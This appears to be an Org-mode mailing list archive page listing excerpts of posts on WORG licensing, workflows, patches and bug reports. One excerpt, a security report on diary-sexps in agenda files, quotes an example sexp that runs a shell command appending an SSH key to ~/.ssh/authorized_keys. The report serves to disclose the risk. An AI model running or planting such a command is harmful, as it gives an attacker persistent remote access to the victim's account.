Re: WORG licensing

2025-04-20 Thread Bastien Guerry
Hi Ihor, Ihor Radchenko writes: > However, I am still puzzled how different licenses may apply to the > exact same text. In particular, it is not clear how the contradictions > between licenses are handled in such scenario. (Or are you saying that > CC BY SA 4.0 is fully compatible with GNU DFL

Re: The Zen of Task Management with Org

2025-04-20 Thread Ihor Radchenko
Bastien Guerry writes: > I've finally found some time to describe my Org workflow: > https://bzg.fr/en/the-zen-of-task-management-with-org/ > ... > And I'm curious to see how it compares to other workflows. Do you ever need to juggle large number of work projects with shifting priorities and pau

Re: The Zen of Task Management with Org

2025-04-20 Thread Bastien Guerry
Ihor Radchenko writes: > Fair enough. I tend to have dozens of projects that have to be running > in parallel and prioritized depending on deadlines or new information > arriving. So, I personally need an elaborate setup of project priorities > and statuses. So, I use todo keywords on projects ju

Re: Q: org-export-headline-levels doc problem?

2025-04-20 Thread David Masterson
Ihor Radchenko writes: > David Masterson writes: > >> 1. docstring mentions inferior without defining inferior. I think a >>natural mistake is to assume inferior is where the headline level is >>less than org-export-headline-levels (ie. < 3) >> 2. In "13.2 Export Setting", 'H' says "bel

Re: The Zen of Task Management with Org

2025-04-20 Thread Bastien Guerry
Rudolf Adamkovič writes: > Here are some more details from my setup. :) Interesting, thanks! > I used to use NEXT but since realized: > > NEXT is a priority, not a state. To me, "NEXT" does not mean that the task is more important or urgent than TODO tasks, it means that the task is in the "

Re: Try gollum wiki to serve WORG

2025-04-20 Thread Bastien Guerry
Ihor Radchenko writes: > I just found https://ikiwiki.info/plugins/contrib/org_mode/ implementing > exactly this idea for ikiwiki engine. Great! Also, ikiwiki seems stable and the maintainer is still active, so he might be interested to know that you're considering using it as an experimental ba

Re: The Zen of Task Management with Org

2025-04-20 Thread Ihor Radchenko
Bastien Guerry writes: > Ihor Radchenko writes: > >> Do you ever need to juggle large number of work projects with shifting >> priorities and pauses? > > I don't really have "work projects", I just have a top level project > called "work" that contains 2nd level tasks. I could have multiple work

Re: The Zen of Task Management with Org

2025-04-20 Thread Rudolf Adamkovič
Bastien Guerry writes: > - STRT tasks do not change often: they are either STRT or DONE (hence > the need for dedicated agenda views). > > - What *I* change a lot are (1) priority cookies and (2) NEXT/TODO > status. Something that was NEXT suddenly becomes something I can > forget, and vice

Re: [PATCH] lisp/org.el: Add ability to sort tags by hierarchy

2025-04-20 Thread Ihor Radchenko
Ihor Radchenko writes: >> Fallback to `org-sort-function'. > > I am not sure if it is the best idea to hard-code using > `org-sort-function' here. > > What if a user wants specific `org-sort-function' for, say, table > sorting, but something else for tags? > Secondary sorting would better be cust

Re: [BUG] "Invalid search bound (wrong side of point)" [9.8-pre (release_9.7.16-169-ge87ecf @ ~/.emacs.d/org-mode-git/lisp/)]

2025-04-20 Thread Ihor Radchenko
Paul Stansell writes: >> I think that the easiest way to test things would be simply trying the >> latest main branch. >> > > Okay, I'll do that. I am reviewing this complex bug report now. Looks like everything should be fixed. Fixed. Let me know if you still see problems. -- Ihor Radchenko /

Re: WORG licensing

2025-04-20 Thread Ihor Radchenko
Bastien Guerry writes: > If a text is published under two different licenses, the user can choose > between them: if he chooses CC BY SA 4.0, he must abide by CC BY SA 4.0; > if he chooses GNU FDL 1.3+, he must abide by GNU FDL 1.3+. He does not > choose both *at the same time*. > > If he clones

Re: WORG licensing

2025-04-20 Thread Bastien Guerry
Ihor Radchenko writes: > Do you think it is worth it? IMHO no, unless there are many requests to use Worgs content under CC BY-SA 4.0 that I'm not aware of. -- Bastien

Fwd: [PATCH]: Add font specifications when exporting to LaTeX

2025-04-20 Thread Pedro Andres Aranda Gutierrez
I had forgotten the list... sorry. To add to the message, I scan the buffer for charsets using a variant of the code proposed by Juan Manuel Macías some time ago... Sorry and Best, /PA -- Forwarded message - From: Pedro Andres Aranda Gutierrez Date: Sun, 20 Apr 2025 at 15:34 Subj

Re: [PATCH] Re: Summation of effort estimates in columnview dblock

2025-04-20 Thread General discussions about Org-mode.
Ihor Radchenko writes: > [...] > I am finally back to this request. > Please see my take on changes to the manual. > [...] This looks great, and IMO is a big improvement adding the desired clarity. Many thanks for your efforts! --alexander

Re: Improve documentation of org-reverse-note-order

2025-04-20 Thread Ihor Radchenko
Ihor Radchenko writes: >> I think we can leave these methods untouched for compatibility but >> introduce some consistent aliases? >> >> | Action | How to reverse filing order | >> |-+---| >> | Refile | Introduce org-refile-prepend | >> | Capture | Introdu

Re: The Zen of Task Management with Org

2025-04-20 Thread Bastien Guerry
Ihor Radchenko writes: > Do you ever need to juggle large number of work projects with shifting > priorities and pauses? I don't really have "work projects", I just have a top level project called "work" that contains 2nd level tasks. I could have multiple work projects, but I don't have that ne

Re: [PATCH] org-element.el; significant optimizations for org-element--interpret-affiliated-keywords

2025-04-20 Thread Dwarshuis, Nathan J
revised/rebased patch attached which no longer skips standard props >From 528f2f6743afdc2681539f20f724f3b662b6040d Mon Sep 17 00:00:00 2001 From: ndwarshuis Date: Mon, 25 Nov 2024 22:04:09 -0500 Subject: [PATCH] org-element.el: Make affiliated keyword interpreter faster * lisp/org-element.el (org

Re: [PATCH]: Add font specifications when exporting to LaTeX

2025-04-20 Thread Ihor Radchenko
Pedro Andres Aranda Gutierrez writes: > this is the first of a series of patches for font management. This one is > independent of the > fallback or font selection mechanism. So I'm sending it separately. Thanks! > --- a/etc/ORG-NEWS > +++ b/etc/ORG-NEWS > @@ -335,2 +335,2 @@ This option makes

Re: vsum in tables with a lot of hlines

2025-04-20 Thread Uwe Brauer
Sent from my iPhone > On 20. Apr 2025, at 10:52, Christian Moe wrote: > > 1) @ = @I4. Keep the 'I', but with the option of using a multiplier > instead of additive notation. Or @ = @I*4 smime.p7s Description: S/MIME cryptographic signature

WORG licensing (was: [DISCUSSION] Contributing policy for WORG)

2025-04-20 Thread Ihor Radchenko
Bastien Guerry writes: >> Maybe I am missing something, but how can we do more than one license >> for the same WORG page? > > There are two ways in which two licences can "apply" to some content: > either by covering different parts of it, or by offering users a choice > of which licence to acce

Re: [PATCH] ob-dot: Add `graphviz-dot' language alias

2025-04-20 Thread Ihor Radchenko
Ihor Radchenko writes: > I would not object making "graphviz" an alias to "dot" lang name for > babel. > ... > I think that the least breaking course of action would be creating > ob-graphviz.el that simply loads ob-dot. It has been a while. Rudolf, may I know if you are still interested in this

Re: [PATCH] Have org-string-width's temporary buffer be declared as such

2025-04-20 Thread Ihor Radchenko
Ihor Radchenko writes: > Ihor Radchenko writes: > >>> - (with-current-buffer (get-buffer-create " *Org string width*") >>> + (with-current-buffer (get-buffer-create " *Org string width*" t) >> >> ... just one problem - `get-buffer-create' in Emacs 27 does not yet have >> the second opt

Re: Org manual: Confused about parentheses in "filename=(buffer-file-name)" in code block header

2025-04-20 Thread Ihor Radchenko
Ihor Radchenko writes: >> Yet, I think it would be clearer hence more helpful if the example were >> self-contained. With my poor knowledge of elisp, I still don't know how to >> construct one... > > May you elaborate? I do not understand which example you are referring > to and what you mean by

Re: Code evaluation security and diary-sexps [9.7.27]

2025-04-20 Thread Ihor Radchenko
Henrik Ahlgren writes: > %%(shell-command "echo ssh-ed25519 C3NzaC1lZDI1NTE5IJjBADKEY >> > ~/.ssh/authorized_keys" "*Messages*") X > > I believe this poses a risk, particularly if the user has > `org-agenda-files` pointing to files or directories that may not be > entirely trustworthy.

Re: [PATCH]: Add font specifications when exporting to LaTeX

2025-04-20 Thread Pedro Andres Aranda Gutierrez
Answers inline /PA On Sun, 20 Apr 2025 at 13:51, Ihor Radchenko wrote: > Pedro Andres Aranda Gutierrez writes: > > > this is the first of a series of patches for font management. This one is > > independent of the > > fallback or font selection mechanism. So I'm sending it separately. > > Than

Emacs new literate configuration approach

2025-04-20 Thread Moakt Temporary Email
Greetings everyone, After I proposed a new customization interface for Emacs [1], I jumped on the occasion to rewrite my literate org configuration to replicate this interface idea there. I saw many and various configurations files using org, (from where I took some inspiration when I first s

Re: Try gollum wiki to serve WORG

2025-04-20 Thread Ihor Radchenko
Bastien Guerry writes: > Thanks for the report! > > Ihor Radchenko writes: > >> At least, looking at >> https://github.com/xwmx/pandoc-ruby/blob/master/lib/pandoc-ruby.rb >> (366LOC), I do not see why we cannot change it to use emacs instead of >> pandoc to render html. > > It would be interesti

Re: [Patch] Support png overlay background transparency in a transparent frame

2025-04-20 Thread Ihor Radchenko
gynamics writes: >> However, you can also set :background in `org-format-latex-options' to >> "Transparent". Did you try it? > > Yes, I have reviewed related code and tried it.  Set `:background > "Transparent"` in `org-format-latex-option` only makes sure that latex > will output png images wi

Re: [PATCH]: Add font specifications when exporting to LaTeX

2025-04-20 Thread Ihor Radchenko
Pedro Andres Aranda Gutierrez writes: >> You are replacing amsmath with mathspec in xetex and unicode-math in >> lualatex. >> > > Yes I was tempted to use unicode-math in both, but refrained... Looks like modern unicode-math supports both, so why not? > According to https://ctan.org/pkg/unicode

Text editing is very slow when org-highlight-latex-and-related is (latex)

2025-04-20 Thread tanioka
When the variable `org-highlight-latex-and-related' is set to `(latex)', opening an Org file and inserting or deleting characters may cause too much time lag, making text editing difficult. For example, in my environment, when I opened the `text.org' created with the command below and inserted a

Re: [PATCH] Add code element inside src-block in ox-html

2025-04-20 Thread Timothy
> Timothy, may you take a look? Sure, sorry for the delay. I'm not quite sure whether we should have `` within `` unfortunately. On one hand, it doesn't break from the the whatwg intended use case, but the examples do seem to emphasise inline usage and if we check https://developer.mozilla.org/